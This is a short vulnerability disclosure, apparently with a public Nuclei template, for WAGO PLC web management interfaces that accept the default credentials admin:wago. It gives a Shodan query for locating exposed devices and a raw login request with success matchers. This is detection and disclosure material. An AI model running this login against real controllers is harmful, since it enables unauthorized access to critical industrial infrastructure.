Identified WAGO Web-Based Management interfaces that were accessible using default credentials (admin:wago).These interfaces are used to configure and monitor WAGO programmable logic controllers (PLCs) and automation systems. Use of factory-default credentials exposed critical OT infrastructure to unauthorized access.
PoC代码[已公开]
id: wago-webbased-default-login
info:
name: WAGO Web based Management - Default Login
author: biero-el-corridor
severity: high
description: |
Identified WAGO Web-Based Management interfaces that were accessible using default credentials (admin:wago).These interfaces are used to configure and monitor WAGO programmable logic controllers (PLCs) and automation systems. Use of factory-default credentials exposed critical OT infrastructure to unauthorized access.
metadata:
shodan-query: html:"WAGO Ethernet Web-based Management"
verified: true
max-request: 1
tags: wago,default-login,vuln
http:
- raw:
- |
POST /wbm/login.php HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Origin: {{RootURL}}
Referer: {{RootURL}}/wbm/index.php
{"username":"admin","password":"wago"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"username":"admin"'
- '"isDefaultPW":"1"'
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450221008825c486a7206189c3e03062def4591d485c3304a176e76b2007bff8c947474c02206895edc221dafa76c0f4f924bfa1cca93d70149bdcf8147c772b53e61ddef096:922c64590222798bb761d5b6d8e72950